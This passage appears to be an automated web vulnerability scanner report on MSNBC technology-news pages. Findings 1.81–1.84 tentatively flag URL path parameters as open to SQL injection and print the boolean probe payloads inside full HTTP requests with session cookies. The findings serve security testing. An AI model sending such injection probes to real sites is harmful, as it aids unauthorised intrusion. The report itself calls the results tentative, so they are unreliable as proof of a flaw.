<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1838711579&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/2010/08/16'%20and%201%3d2--%20/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:36:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39897

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=348724747&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=348724747&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.81. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2010%20and%201%3d1--%20/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1942292609&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1942292609&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="
...[SNIP]...

Request 2

GET /_news/2010%20and%201%3d2--%20/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39899

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1829603836&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1829603836&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="
...[SNIP]...

1.82. http://technolog.msnbc.redacted/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2011/01/24'%20and%201%3d1--%20/5907778-apple-calls-to-award-woman-10k-she-hangs-up HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1152911927&amp;do=msnbc.msn.com&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1152911927&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2011/01/24'%20and%201%3d2--%20/5907778-apple-calls-to-award-woman-10k-she-hangs-up HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39899

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1131262040&amp;do=msnbc.msn.com&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1131262040&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.83. http://technolog.msnbc.redacted/_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 87273916%20or%201%3d1--%20 and 87273916%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/201187273916%20or%201%3d1--%20/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:28:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=799317169&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=799317169&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/201187273916%20or%201%3d2--%20/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:28:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1557992197&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1557992197&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

1.84. http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13719482'%20or%201%3d1--%20 and 13719482'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/201113719482'%20or%201%3d1--%20/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see HTTP/1.1
Host: technolog.msnbc.redacted
